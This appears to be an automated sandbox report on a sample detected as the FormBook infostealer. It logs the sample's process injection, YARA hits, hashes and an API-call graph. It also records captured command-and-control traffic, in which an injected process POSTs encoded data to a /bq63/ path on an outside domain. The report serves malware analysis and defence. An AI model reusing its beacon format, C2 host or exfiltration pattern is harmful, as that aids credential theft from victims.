                                                            Data Ascii: adi-gallery .ladi-gallery-view>.ladi-gallery-view-item{background-size:cover;background-repeat:no-repeat;background-position:center center;width:100%;height:100%;position:relative;display:none;transition:transform 350ms ease-in-out;-webkit-bac
                                                            Jan 11, 2025 05:40:21.147396088 CET1236INData Raw: 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 6e 65 78 74 7b 6c 65 66 74 3a 31 30 30 25 7d 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 20 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 70 72 65 76 7b 6c 65 66 74 3a 2d 31 30 30
                                                            Data Ascii: ladi-gallery-view>.next{left:100%}.ladi-gallery .ladi-gallery-view>.prev{left:-100%}.ladi-gallery .ladi-gallery-view>.next.left,.ladi-gallery .ladi-gallery-view>.prev.right{left:0}.ladi-gallery .ladi-gallery-view>.selected.left{left:-100%}.lad


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.653771209.74.79.40803880C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:40:34.576555014 CET725OUTPOST /bq63/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.shopphere.store
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 212
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.shopphere.store
                                                            Referer: http://www.shopphere.store/bq63/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 45 4f 69 30 48 30 68 4e 78 73 77 44 58 7a 6e 42 64 32 39 59 39 79 75 2b 42 46 6e 74 6b 51 4b 45 44 59 75 55 47 2b 74 5a 63 68 4f 77 34 2b 53 6c 62 52 79 49 38 64 71 4b 58 4d 59 54 75 53 58 52 71 6a 59 4e 6a 43 44 75 64 4c 59 71 63 6e 51 42 62 46 58 76 65 56 41 72 5a 6b 74 46 7a 70 4f 70 64 75 42 30 6d 70 72 6f 31 68 4b 57 79 76 66 6d 77 69 41 70 31 68 32 36 46 2f 4e 46 57 51 74 31 39 6a 6d 68 74 32 30 33 4b 68 5a 4f 39 79 72 6d 54 44 4d 33 34 2b 31 42 2b 39 55 4d 58 63 6c 61 52 38 74 70 7a 55 6d 34 4b 43 79 41 38 77 38 32 36 43 43 4b 78 78 75 68 31 6b 45 6a 62 6c 42 33 50 4e 45 31 53 63 53 7a 44 57 2f 4b
                                                            Data Ascii: pLNPctn=EOi0H0hNxswDXznBd29Y9yu+BFntkQKEDYuUG+tZchOw4+SlbRyI8dqKXMYTuSXRqjYNjCDudLYqcnQBbFXveVArZktFzpOpduB0mpro1hKWyvfmwiAp1h26F/NFWQt19jmht203KhZO9yrmTDM34+1B+9UMXclaR8tpzUm4KCyA8w826CCKxxuh1kEjblB3PNE1ScSzDW/K
                                                            Jan 11, 2025 05:40:35.161891937 CET533INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:40:35 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.653772209.74.79.40803880C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:40:37.130539894 CET749OUTPOST /bq63/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.shopphere.store
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 236
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.shopphere.store
                                                            Referer: http://www.shopphere.store/bq63/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 45 4f 69 30 48 30 68 4e 78 73 77 44 56 54 33 42 4e 68 4a 59 71 69 75 39 59 6c 6e 74 75 77 4b 41 44 59 53 55 47 38 42 4a 63 53 71 77 37 61 57 6c 59 54 57 49 37 64 71 4b 50 63 59 73 67 79 58 4b 71 69 6b 72 6a 44 50 75 64 4c 4d 71 63 6d 67 42 62 30 58 6f 45 6c 41 70 56 45 74 62 2b 4a 4f 70 64 75 42 30 6d 70 2f 52 31 68 53 57 7a 66 76 6d 78 44 41 75 71 52 32 35 43 2f 4e 46 53 51 74 35 39 6a 6e 30 74 30 41 4a 4b 6e 64 4f 39 79 62 6d 53 57 77 30 32 2b 31 48 36 39 56 31 62 2f 59 67 49 63 6f 71 31 45 36 68 57 41 36 58 39 47 68 73 6d 78 43 70 6a 68 4f 6a 31 6d 63 52 62 46 42 64 4e 4e 38 31 41 4c 65 55 4d 69 61 70 75 54 68 76 31 49 78 42 70 72 4d 61 38 6b 70 66 64 62 59 75 59 67 3d 3d
                                                            Data Ascii: pLNPctn=EOi0H0hNxswDVT3BNhJYqiu9YlntuwKADYSUG8BJcSqw7aWlYTWI7dqKPcYsgyXKqikrjDPudLMqcmgBb0XoElApVEtb+JOpduB0mp/R1hSWzfvmxDAuqR25C/NFSQt59jn0t0AJKndO9ybmSWw02+1H69V1b/YgIcoq1E6hWA6X9GhsmxCpjhOj1mcRbFBdNN81ALeUMiapuThv1IxBprMa8kpfdbYuYg==
                                                            Jan 11, 2025 05:40:37.703903913 CET533INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:40:37 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.653774209.74.79.40803880C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:40:39.671791077 CET1762OUTPOST /bq63/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.shopphere.store
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1248
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.shopphere.store
                                                            Referer: http://www.shopphere.store/bq63/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 45 4f 69 30 48 30 68 4e 78 73 77 44 56 54 33 42 4e 68 4a 59 71 69 75 39 59 6c 6e 74 75 77 4b 41 44 59 53 55 47 38 42 4a 63 53 69 77 37 76 43 6c 59 79 57 49 36 64 71 4b 48 38 59 58 67 79 57 49 71 6a 4d 76 6a 44 53 62 64 49 30 71 61 30 6f 42 64 42 33 6f 52 31 41 70 64 6b 74 47 7a 70 50 6a 64 75 52 77 6d 70 76 52 31 68 53 57 7a 63 33 6d 78 53 41 75 73 52 32 36 46 2f 4e 7a 57 51 74 56 39 69 4f 50 74 30 55 5a 4b 58 39 4f 38 57 33 6d 56 6b 59 30 2b 2b 31 46 39 39 56 45 62 2f 55 46 49 63 6b 49 31 48 6d 66 57 41 4f 58 39 42 63 32 7a 77 75 58 78 48 43 69 69 78 67 55 55 44 39 53 45 37 74 4f 42 4b 65 41 4f 53 47 43 6a 7a 56 37 78 4f 38 74 72 36 49 49 67 68 6b 78 58 66 42 41 4d 36 62 2b 32 5a 32 59 46 61 52 4a 6e 54 54 30 72 71 2b 54 52 67 75 6f 41 6c 73 52 51 46 4c 67 73 77 71 65 75 6c 61 33 77 33 76 67 73 35 6d 4f 57 44 35 44 79 6c 67 4d 66 71 6f 68 4d 44 44 42 5a 6e 6b 30 56 46 48 76 4d 58 53 6a 39 30 51 44 33 37 75 42 33 50 38 79 74 71 44 50 51 43 35 52 2f 52 6e 56 34 46 54 46 45 74 [TRUNCATED]
                                                            Data Ascii: pLNPctn=EOi0H0hNxswDVT3BNhJYqiu9YlntuwKADYSUG8BJcSiw7vClYyWI6dqKH8YXgyWIqjMvjDSbdI0qa0oBdB3oR1ApdktGzpPjduRwmpvR1hSWzc3mxSAusR26F/NzWQtV9iOPt0UZKX9O8W3mVkY0++1F99VEb/UFIckI1HmfWAOX9Bc2zwuXxHCiixgUUD9SE7tOBKeAOSGCjzV7xO8tr6IIghkxXfBAM6b+2Z2YFaRJnTT0rq+TRguoAlsRQFLgswqeula3w3vgs5mOWD5DylgMfqohMDDBZnk0VFHvMXSj90QD37uB3P8ytqDPQC5R/RnV4FTFEtdI/eDy46/qWxOnVo0cP0ZbPaKR8jADy4bwUruvQoJpC6cGTN+0MW1lzGtLLnnVxAqacLWUcPNaDF2UPzyVasoio6yL5u2Ryf+sloY7ahKwi7vDJfmxwGcFYD7+krWk2h5pEbnaCLR3exNpo1TgA5bpWlDzoi6qV+iOkwDe4leO8ReP3zvd0dOjN4DfObjCnTsmx8hNfQ9F3RDAvyvGTtt0Go4aPesIjAB/rofHa0Xs4hdB7A6Vm9ZjDhI3rlgIPDjjfh4wt7/LmUCiUVqRjIW2K0sdXaOJoaPQFA2ToNc62AU7bz9LW2b1KMzeoLrZLub0B4amjVOQ/rJmjtzTrUD1HeEfP+KlhHL/4uJOs/XUTM8sqWyjqwZOkOy5JaCFIwXM+XMttgb5VLZTTw+gGPV56QoJOOt9cki/Nd6DpGerUeYgp2heuUBWlyuyxORTGNvnqE4BuJIHf5h4XMakXkK+wYCxtm0IaEZ3buXcosBG/wAXoQ4vgtD7g1x8sLV6xri1YDkeuGeS/mSxg0iEPvByFGOPqGRmpueG+qMNMxgtH32USBto1W5jNQzeDhbEGQpW3CjkbTLcYLLh4taEQIGatBSCVIT2hW1i955gYnG/p4wUC+2A7xLPBRx6Z7YwxwIimJ1qAMJstRVPTXEXXkLqC/KDAPtwuukM [TRUNCATED]
                                                            Jan 11, 2025 05:40:40.244244099 CET533INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:40:40 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.653775209.74.79.40803880C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:40:42.379537106 CET466OUTGET /bq63/?yL=ohjXjzZp0vl4&pLNPctn=JMKUEBcn+eAmAFujaEF1qxeVIjz6+zqaFMGoHelGSQfwy8OfYyWy6eToJbov20XPgBo7nj3xQKoGJ28WWnvYSwxzVh5Y8omsVuJaqqj7jyf3zIW+vgojp3i5Cusjdn8f20Ku4TQ= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.shopphere.store
                                                            Connection: close
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Jan 11, 2025 05:40:42.944967031 CET548INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:40:42 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:23:38:43
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\BLv4mI7zzY.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\BLv4mI7zzY.exe"
                                                            Imagebase:0x430000
                                                            File size:1'198'080 bytes
                                                            MD5 hash:B6A92EE2BA34B81FA9484072B4D20072
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:23:38:44
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\BLv4mI7zzY.exe"
                                                            Imagebase:0xc50000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:23:39:25
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe"
                                                            Imagebase:0x360000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:23:39:27
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\RMActivate_ssp_isv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\RMActivate_ssp_isv.exe"
                                                            Imagebase:0xac0000
                                                            File size:478'720 bytes
                                                            MD5 hash:E7516E154D7AEE0ECD4BF892C3BC33C2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:8
                                                            Start time:23:39:53
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff728280000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3.7%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:6.4%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:69
                                                              execution_graph 100678 433633 100679 43366a 100678->100679 100680 4336e7 100679->100680 100681 433688 100679->100681 100719 4336e5 100679->100719 100683 46d0cc 100680->100683 100684 4336ed 100680->100684 100685 433695 100681->100685 100686 43374b PostQuitMessage 100681->100686 100682 4336ca DefWindowProcW 100687 4336d8 100682->100687 100727 441070 10 API calls Mailbox 100683->100727 100688 4336f2 100684->100688 100689 433715 SetTimer RegisterWindowMessageW 100684->100689 100691 46d154 100685->100691 100692 4336a0 100685->100692 100686->100687 100693 46d06f 100688->100693 100694 4336f9 KillTimer 100688->100694 100689->100687 100696 43373e CreatePopupMenu 100689->100696 100743 492527 71 API calls _memset 100691->100743 100697 433755 100692->100697 100698 4336a8 100692->100698 100701 46d074 100693->100701 100702 46d0a8 MoveWindow 100693->100702 100723 43443a Shell_NotifyIconW _memset 100694->100723 100695 46d0f3 100728 441093 331 API calls Mailbox 100695->100728 100696->100687 100725 4344a0 64 API calls _memset 100697->100725 100705 4336b3 100698->100705 100706 46d139 100698->100706 100709 46d097 SetFocus 100701->100709 100710 46d078 100701->100710 100702->100687 100712 4336be 100705->100712 100713 46d124 100705->100713 100706->100682 100742 487c36 59 API calls Mailbox 100706->100742 100707 46d166 100707->100682 100707->100687 100708 433764 100708->100687 100709->100687 100710->100712 100714 46d081 100710->100714 100711 43370c 100724 433114 DeleteObject DestroyWindow Mailbox 100711->100724 100712->100682 100729 43443a Shell_NotifyIconW _memset 100712->100729 100741 492d36 81 API calls _memset 100713->100741 100726 441070 10 API calls Mailbox 100714->100726 100719->100682 100721 46d118 100730 43434a 100721->100730 100723->100711 100724->100687 100725->100708 100726->100687 100727->100695 100728->100712 100729->100721 100731 434375 _memset 100730->100731 100744 434182 100731->100744 100734 4343fa 100736 434430 Shell_NotifyIconW 100734->100736 100737 434414 Shell_NotifyIconW 100734->100737 100738 434422 100736->100738 100737->100738 100748 43407c 100738->100748 100740 434429 100740->100719 100741->100708 100742->100719 100743->100707 100745 46d423 100744->100745 100746 434196 100744->100746 100745->100746 100747 46d42c DestroyIcon 100745->100747 100746->100734 100770 492f94 62 API calls _W_store_winword 100746->100770 100747->100746 100749 434098 100748->100749 100750 43416f Mailbox 100748->100750 100771 437a16 100749->100771 100750->100740 100753 4340b3 100776 437bcc 100753->100776 100754 46d3c8 LoadStringW 100757 46d3e2 100754->100757 100756 4340c8 100756->100757 100758 4340d9 100756->100758 100759 437b2e 59 API calls 100757->100759 100760 4340e3 100758->100760 100761 434174 100758->100761 100764 46d3ec 100759->100764 100785 437b2e 100760->100785 100794 438047 100761->100794 100767 4340ed _memset _wcscpy 100764->100767 100798 437cab 100764->100798 100766 46d40e 100769 437cab 59 API calls 100766->100769 100768 434155 Shell_NotifyIconW 100767->100768 100768->100750 100769->100767 100770->100734 100805 450db6 100771->100805 100773 437a3b 100815 438029 100773->100815 100777 437c45 100776->100777 100778 437bd8 __wsetenvp 100776->100778 100847 437d2c 100777->100847 100780 437c13 100778->100780 100781 437bee 100778->100781 100783 438029 59 API calls 100780->100783 100846 437f27 59 API calls Mailbox 100781->100846 100784 437bf6 _memmove 100783->100784 100784->100756 100786 437b40 100785->100786 100787 46ec6b 100785->100787 100855 437a51 100786->100855 100861 487bdb 59 API calls _memmove 100787->100861 100790 437b4c 100790->100767 100791 46ec75 100792 438047 59 API calls 100791->100792 100793 46ec7d Mailbox 100792->100793 100795 438052 100794->100795 100796 43805a 100794->100796 100862 437f77 59 API calls 2 library calls 100795->100862 100796->100767 100799 46ed4a 100798->100799 100800 437cbf 100798->100800 100802 438029 59 API calls 100799->100802 100863 437c50 100800->100863 100804 46ed55 __wsetenvp _memmove 100802->100804 100803 437cca 100803->100766 100807 450dbe 100805->100807 100808 450dd8 100807->100808 100810 450ddc std::exception::exception 100807->100810 100818 45571c 100807->100818 100835 4533a1 DecodePointer 100807->100835 100808->100773 100836 45859b RaiseException 100810->100836 100812 450e06 100837 4584d1 58 API calls _free 100812->100837 100814 450e18 100814->100773 100816 450db6 Mailbox 59 API calls 100815->100816 100817 4340a6 100816->100817 100817->100753 100817->100754 100819 455797 100818->100819 100827 455728 100818->100827 100844 4533a1 DecodePointer 100819->100844 100821 45579d 100845 458b28 58 API calls __getptd_noexit 100821->100845 100824 45575b RtlAllocateHeap 100825 45578f 100824->100825 100824->100827 100825->100807 100827->100824 100828 455733 100827->100828 100829 455783 100827->100829 100833 455781 100827->100833 100841 4533a1 DecodePointer 100827->100841 100828->100827 100838 45a16b 58 API calls __NMSG_WRITE 100828->100838 100839 45a1c8 58 API calls 7 library calls 100828->100839 100840 45309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100828->100840 100842 458b28 58 API calls __getptd_noexit 100829->100842 100843 458b28 58 API calls __getptd_noexit 100833->100843 100835->100807 100836->100812 100837->100814 100838->100828 100839->100828 100841->100827 100842->100833 100843->100825 100844->100821 100845->100825 100846->100784 100848 437d43 _memmove 